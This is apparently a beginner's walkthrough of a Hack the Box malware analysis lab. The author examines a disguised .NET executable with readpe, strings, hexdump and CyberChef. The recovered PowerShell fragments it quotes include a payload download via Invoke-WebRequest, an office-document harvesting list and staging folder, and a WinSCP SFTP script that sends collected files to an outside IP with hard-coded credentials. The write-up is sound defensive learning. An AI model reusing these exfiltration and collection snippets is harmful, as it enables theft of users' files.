Heartbreaker-Continuum
Hack the Box Malware Analysis Lab
Introduction
This will be my first piece of malware I have ever analysed, I am using my VM to extract and view the malware sample.
Question 1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash.
Answer: Using my terminal I used the sha256sum command to grab its hash.
└─$ sha256sum Superstar_MemberCard.tiff.exe
12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3 Superstar_MemberCard.tiff.exeQuestion 2: When was the binary file originally created, according to its metadata (UTC)?
Answer: Since its my first time looking into how to perform analysis, I looked up how to grab the most amount of information about a file. I needed to install readpe! Then to analyse the file to give me the time and date.
└─$ readpe Superstar_MemberCard.tiff.exe
DOS Header
Magic number: 0x5a4d (MZ)
Bytes in last page: 144
Pages in file: 3
Relocations: 0
Size of header in paragraphs: 4
Minimum extra paragraphs: 0
Maximum extra paragraphs: 65535
Initial (relative) SS value: 0
Initial SP value: 0xb8
Initial IP value: 0
Initial (relative) CS value: 0
Address of relocation table: 0x40
Overlay number: 0
OEM identifier: 0
OEM information: 0
PE header offset: 0x80
PE header
Signature: 0x00004550 (PE)
COFF/File header
Machine: 0x14c IMAGE_FILE_MACHINE_I386
Number of sections: 3
Date/time stamp: 1710326286 (Wed, 13 Mar 2024 10:38:06 UTC)
Symbol Table offset: 0
Number of symbols: 0
Size of optional header: 0xe0
Characteristics: 0x102
Characteristics names
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_32BIT_MACHINE
Optional/Image header
Magic number: 0x10b (PE32)
Linker major version: 11
Linker minor version: 0
Size of .text section: 0x9600
Size of .data section: 0x800
Size of .bss section: 0
Entrypoint: 0xb50e
Address of .text section: 0x2000
Address of .data section: 0xc000
ImageBase: 0x400000
Alignment of sections: 0x2000
Alignment factor: 0x200
Major version of required OS: 4
Minor version of required OS: 0
Major version of image: 0
Minor version of image: 0
Major version of subsystem: 4
Minor version of subsystem: 0
Win32 version value: 0
Overwrite OS major version: (default)
Overwrite OS minor version: (default)
Overwrite OS build number: (default)
Overwrite OS platform id: (default)
Size of image: 0x10000
Size of headers: 0x200
Checksum: 0
Subsystem required: 0x2 (IMAGE_SUBSYSTEM_WINDOWS_GUI)
DLL characteristics: 0x8540
DLL characteristics names
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
IMAGE_DLLCHARACTERISTICS_NX_COMPAT
IMAGE_DLLCHARACTERISTICS_NO_SEH
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE
Size of stack to reserve: 0x100000
Size of stack to commit: 0x1000
Size of heap space to reserve: 0x100000
Size of heap space to commit: 0x1000
Loader Flags: 0
Loader Flags names
Data directories
Directory
IMAGE_DIRECTORY_ENTRY_IMPORT: 0xb4bc (79 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_RESOURCE: 0xc000 (1312 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_BASERELOC: 0xe000 (12 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_IAT: 0x2000 (8 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: 0x2008 (72 bytes)
Imported functions
Library
Name: mscoree.dll
Functions
Function
Hint: 0
Name: _CorExeMain
Exported functions
Sections
Section
Name: .text
Virtual Size: 0x9514 (38164 bytes)
Virtual Address: 0x2000
Size Of Raw Data: 0x9600 (38400 bytes)
Pointer To Raw Data: 0x200
Number Of Relocations: 0
Characteristics: 0x60000020
Characteristic Names
IMAGE_SCN_CNT_CODE
IMAGE_SCN_MEM_EXECUTE
IMAGE_SCN_MEM_READ
Section
Name: .rsrc
Virtual Size: 0x520 (1312 bytes)
Virtual Address: 0xc000
Size Of Raw Data: 0x600 (1536 bytes)
Pointer To Raw Data: 0x9800
Number Of Relocations: 0
Characteristics: 0x40000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
Section
Name: .reloc
Virtual Size: 0xc (12 bytes)
Virtual Address: 0xe000
Size Of Raw Data: 0x200 (512 bytes)
Pointer To Raw Data: 0x9e00
Number Of Relocations: 0
Characteristics: 0x42000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_DISCARDABLE
IMAGE_SCN_MEM_READQuestion 3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?
Answer: Using the same output as before, I looked for the actual text within the file. Not the headers and their sizes. Giving me an answer of 38400.
Exported functions
Sections
Section
Name: .text
Virtual Size: 0x9514 (38164 bytes)
Virtual Address: 0x2000
Size Of Raw Data: 0x9600 (38400 bytes)
Pointer To Raw Data: 0x200
Number Of Relocations: 0
Characteristics: 0x60000020
Characteristic Names
IMAGE_SCN_CNT_CODE
IMAGE_SCN_MEM_EXECUTE
IMAGE_SCN_MEM_READQuestion 4: It appears that the binary may have undergone a file conversion process. Could you determine its original filename?
Answer: This is also something I had never done before, finding its original file name. After some research, using the command strings might give me the answer.
get_State
get_Reason
CompilerGeneratedAttribute
newILY.ps1
WrapNonExceptionThrows
_CorExeMain
mscoree.dllIt looks like there is a name of a .ps1 file in the strings of the file. This seems to be the original name.
Question 5: Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.
Answer: Now obfuscated code is normally done by writing code then converting it to Base64 to be used in the file. Using the hexdump command with the argument of -C, I can look for code that is obfuscated.
└─$ hexdump -C Superstar_MemberCard.tiff.exeThe output around the seemingly obfuscated code was the following:
00002c50 00 70 28 27 00 00 0a 6f 28 00 00 0a 28 a6 00 00 |.p('...o(...(...|
00002c60 0a 73 1c 01 00 0a 7a 1e 02 28 11 00 00 0a 2a 00 |.s....z..(....*.|
00002c70 36 1e 00 00 24 73 43 72 74 20 3d 20 22 3d 3d 67 |6...$sCrt = "==g|
00002c80 43 4e 55 32 59 79 39 6d 52 74 41 53 5a 7a 4a 58 |CNU2Yy9mRtASZzJX|
00002c90 64 6a 56 6d 55 74 41 69 63 70 52 45 64 6c 64 6d |djVmUtAicpREdldm|
00002ca0 63 68 52 48 4a 67 67 47 64 68 42 56 4c 67 30 57 |chRHJggGdhBVLg0W|The third line is where the code becomes a jumbled mess of characters. The hexadecimal offset at the start of this code would be: 2c74. The reason being the code starts at the 9 place in the hexadecimal column.
Question 6: The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?
Answer: The main body of the code seems to start after the obfuscated section that I found earlier. Since the upper half of the hex dump is the header of the file. Scrolling down a little I looked for any mention of a text file and encoding method.
000049f0 3d 20 5b 73 59 73 54 65 4d 2e 74 45 78 54 2e 65 |= [sYsTeM.tExT.e|
00004a00 4e 63 4f 64 49 6e 47 5d 3a 3a 75 54 66 38 2e 47 |NcOdInG]::uTf8.G|
00004a10 65 54 73 54 72 49 6e 47 28 5b 73 59 73 54 65 4d |eTsTrInG([sYsTeM|
00004a20 2e 63 4f 6e 56 65 52 74 5d 3a 3a 66 52 6f 4d 62 |.cOnVeRt]::fRoMb|
00004a30 41 53 65 36 34 73 54 72 49 6e 47 28 22 24 65 6e |ASe64sTrInG("$en|There are a couple of interesting things here, firstly the GeTsTrInG that seems to be called to convert from Base64, giving us our answer.
Question 7: What is the specific cmdlet utilized that was used to initiate file downloads?
Answer: I had never done anything like this before, so after some research I found you can use a tool such as CyberChef to reverse engineer the code and turn the Base64 code into something more legible.
Press enter or click to view image in full size
I selected the Reverse recipe and the From Base64 to make the code readable. Now I can go hunting for my answer. At the very top of the file seems to have held the answer.
Invoke-WebRequest -Uri $url -OutFile $imgThe Invoke-WebRequest command is the answer. It intakes a URL and the file. Meaning it can initiate downloads.
Question 8: Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.
Answer: This was rather simple, looking for IP address that the malware wants to connect to.
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
$url = "http://44.206.187.144:9000/Superstar_MemberCard.tiff"Question 9: The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?
Answer: There were a few file paths within the malware. But malware loves to invoke a variable called $targetDir that dumps the users information in the form of .txt files.
$searchDir = "C:\Users"
$targetDir = "C:\Users\Public\Public Files"
if (-not (Test-Path -Path $targetDir -PathType Container)) {
New-Item -ItemType Directory -Path $targetDir -Force | Out-Null
}Question 10: What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?
Answer: Looking through the code it was pretty clear that the malware wants to search for specific files with the following extensions:
$extList = "*.doc", "*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx", "*.pdf", "*.csv", ".*oft", "*.potx",
"*.xltx", "*.dotx", "*.msg", "*.eml", "*.pst", "*.odt", "*.ods", "*.odp", "*.odg", "*.ost"Meaning this malware would fall under the MITRE ID T1119, automated collection of data.
Question 11: What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?
Answer: There was an interesting line of code that stood out to me here. The malware attempts to open a secure FTP link with the credentials: service and password M8&C!i6KkmGL1-#, at the address 35.169.66.138. Pointing to an obvious exfiltration route for the data.
$wExePath = "$wExtractPath\WinSCP.com"
$sPath = "$wExtractPath\maintenanceScript.txt"
@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@ | Out-File -FilePath $sPath -Force
Start-Process -FilePath $wExePath -ArgumentList "/script=`"$sPath`"" -Wait -NoNewWindow
Conclusion
This was my first attempt at malware analysis. It took quite a bit of research and I learnt a lot along the way. I hope I can get my hands on more of theses and expand my knowledge some more, this is a major interest of mine within cybersecurity.
Last updated